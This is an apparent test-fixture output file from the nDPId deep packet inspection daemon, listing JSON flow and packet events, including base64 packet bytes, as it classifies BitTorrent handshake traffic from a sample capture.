-01314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1455469975379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":600,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":600,"pkt_l4_len":566,"thread_ts_msec":1455469975379,"pkt":"xCwDBkn+LFbcjDU0CABFAAJKCedAAHIGROOXGl8ewKgBA1iRzq\/yoqkFBEW1zYAYHVwJbQAAAQEIChEqC1QZ3A9hYWdvaTJlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkyMjY3M2U0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MTFlNjp5b3VyaXA0OlI3zQFlAAAAdAV\/v+\/\/f\/\/+\/\/\/\/\/\/\/\/\/\/fv\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/f\/\/\/\/\/9\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/7\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/f\/\/\/\/7\/7\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/9\/9\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/ff+AAAAABQQAAAC+AAAABQQAAAB0AAAABQQAAAJcAAAABQQAAAOGAAAABQQAAAEaAAAABQQAAAA3AAAABQQAAAL2AAAABQQAAAOAAAAABQQAAAGXAAAABQQAAALiAAAABQQAAAIeAAAABQQAAAFXAAAABQQAAAJLAAAABQQAAAB7AAAABQQAAAI\/AAAABQQAAADyAAAABQQAAAAAAAAABQQAAAAgAAAABQQAAAH+AAAABQQAAANsAAAABQQAAAATAAAABQQAAALWAAAABQQAAAAJAAAABQQAAAGq"} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455469975393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1455469975393,"pkt":"LFbcjDU0xCwDBkn+CABFAADeIplAAEAGAADAqAEDl0j\/o86w6hjbuZVQ\/XvsloAYKDdZaAAAAQEIChncD64AaNAEMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEyOnV0X3JlY29tbWVuZGk1ZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0OpdI\/6NlAAAAAQ8="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975407,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4fvZAAEAGAADAqAEDeD4h8c6umaQbpzY0C9TW44AYjjZcRQAAAQEIChncD7sAQ+m5E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhq4aGFIV+2F24M="} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975622,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4JlBAAEAGAADAqAEDTzeBFs6sL0FM+lulp3q\/xoAYVhCSYwAAAQEIChncEJACXeJGE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsY\/A3YcaePRRY8="} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1455469976336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469976336,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4SfNAAEAGAADAqAEDxmSSCc6z6wOon+tuBozVl4AYZVEahAAAAQEIChncE1MB8nMrE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkC3tYvcSfI56Y="} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1455469976513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1455469976513,"pkt":"xCwDBkn+LFbcjDU0CABFEACEZqRAAHYGg6bGZJIJwKgBA+sDzrMGjNWXqJ\/rsoAYAQLT1gAAAQEICgHycz0Z3BNTE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wokMyLr47j7jk1aEAAADnFABkMTplaTA="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1455469976582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469976582,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4BctAAEAGAADAqAEDvmfDOM6ytinSUvXkM6bvoIAY+3dDtgAAAQEIChncFEcAv3iAE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkKv+eYrLs2+ChY="} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -01351{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1455469976697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":625,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":625,"pkt_l4_len":591,"thread_ts_msec":1455469976697,"pkt":"xCwDBkn+LFbcjDU0CABFEAJjaOxAAHYGf3\/GZJIJwKgBA+sDzrMGjNXnqJ\/rsoAYAQJs0QAAAQEICgHyc00Z3BQDZTQ6aXB2NDQ6xmSSCTEyOmNvbXBsZXRlX2Fnb2kxZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTE1ZTY6eW91cmlwNDpSN80BZQAAAHQFv\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/f\/\/\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/f\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/9\/\/\/\/\/\/7\/\/\/7\/+7\/\/f\/3\/f\/\/\/\/v\/\/\/\/\/\/\/9\/9\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/3\/\/\/\/gAAAAAUEAAAClgAAAAUEAAAA6gAAAAUEAAAAugAAAAUEAAAA4AAAAAUEAAABqgAAAAUEAAACZwAAAAUEAAACTwAAAAUEAAAC8gAAAAUEAAABiQAAAAUEAAAB3QAAAAUEAAADdAAAAAUEAAAC\/gAAAAUEAAACJgAAAAUEAAACiAAAAAUEAAACvwAAAAUEAAACeQAAAAUEAAABRQAAAAUEAAACCwAAAAUEAAAAkgAAAAUEAAACdQAAAAUEAAACoAAAAAUEAAAAAQAAAAUEAAAAFAAAAAUEAAADTw=="} -00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1455469977023,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1455469977023,"pkt":"xCwDBkn+LFbcjDU0CABFAACFWMJAAHMGa2W+Z8M4wKgBA7YpzrIzpu+g0lL2KIAYAQKm2wAAAQEICgC\/ehQZ3BRHE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xovjV8bH+iIGCHSYAAAEBFABkMTplaTBl"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1455469977229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469977229,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4L\/xAAEAGAADAqAEDlw8wvc61t5l0EJCE2E\/BJoAYIPWJ4gAAAQEIChncFslLXJigE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjv4JZL7rS4V2Vgo="} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1455469977285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":1455469977285,"pkt":"xCwDBkn+LFbcjDU0CABFAACLG6xAAHIGY0mXDzC9wKgBA7eZzrXYT8EmdBCQyIAYAQLHiQAAAQEICktcmNgZ3BbJE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogWCKk\/sCNEtOuUAAADnFABkMTplaTBlNDppcHY0"} -01336{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1455469977324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":1455469977324,"pkt":"xCwDBkn+LFbcjDU0CABFAAJcG65AAHIGYXaXDzC9wKgBA7eZzrXYT8F9dBCQyIAZAQKR1gAAAQEICktcmOYZ3BbJNDqXDzC9MTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0NzAwMWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MTdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/\/\/\/\/7\/\/\/\/\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/u\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/37\/\/\/\/\/\/\/\/\/\/f\/\/3\/\/3\/\/\/7\/\/\/\/v\/\/f\/\/\/f\/\/\/3\/\/\/\/\/\/v\/\/f\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/3\/\/\/+AAAAABQQAAAMOAAAABQQAAAApAAAABQQAAAJ1AAAABQQAAAKiAAAABQQAAADVAAAABQQAAAH3AAAABQQAAANZAAAABQQAAADFAAAABQQAAAN2AAAABQQAAAD5AAAABQQAAAD9AAAABQQAAAL9AAAABQQAAAKRAAAABQQAAAK6AAAABQQAAAC9AAAABQQAAAFxAAAABQQAAAHwAAAABQQAAAJKAAAABQQAAAFDAAAABQQAAAJcAAAABQQAAABWAAAABQQAAALUAAAABQQAAAI2AAAABQQAAAB7"} -01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1455469977685,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"thread_ts_msec":1455469977685,"pkt":"xCwDBkn+LFbcjDU0CABFAAJ8WMNAAHMGaW2+Z8M4wKgBA7YpzrIzpu\/x0lL2fIAYAQLBOgAAAQEICgC\/e9sZ3BX+NDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzEyOmNvbXBsZXRlX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDY2MzNlNDpyZXFxaTI1NWUxOnYxNjpCaXRUb3JyZW50IDcuOS41Mjp5cGk1MjkxNGU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/X\/\/\/v\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f+\/\/\/7\/\/\/\/v\/\/\/\/\/99\/\/+\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+7\/\/3\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/77\/\/\/f\/\/\/3\/3f\/3\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAApsAAAAFBAAAAk8AAAAFBAAAAtoAAAAFBAAAAWUAAAAFBAAAAxcAAAAFBAAAAVIAAAAFBAAAAsoAAAAFBAAAASUAAAAFBAAAADsAAAAFBAAAAOgAAAAFBAAAAg0AAAAFBAAAArAAAAAFBAAAApUAAAAFBAAAAtYAAAAFBAAAAIEAAAAFBAAAAQkAAAAFBAAAAugAAAAFBAAAAhEAAAAFBAAAAUwAAAAFBAAAAiIAAAAFBAAAAPMAAAAFBAAAAbAAAAAFBAAAACQAAAAFBAAAACI="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1455469978413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469978413,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DnNAAEAGAADAqAEDX+qfEM65oPXUDpz5ZKj0loAYkUPBEAAAAQEIChncG14CELSbE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvUWScco35PygrU="} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1455469978422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469978422,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4xBlAAEAGAADAqAEDX+3BIs66LDm\/gbIP+oH76IAYlsHjJQAAAQEIChncG2YAA5hpE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvGP0W3l6zj59Ik="} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1455469978654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469978654,"pkt":"xCwDBkn+LFbcjDU0CABFAACrIv1AAHYG\/pRf7cEiwKgBAyw5zrr6gfvov4GyU4AYAQLALAAAAQEICgADmIEZ3BtmE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wog5gTbVhOs8MSY8AAADnFABkMTplaTBlNDppcHY0NDpf7cEiMTI6Y29tcGxldGVfYWdvaTJlMTptZDExOnU="} 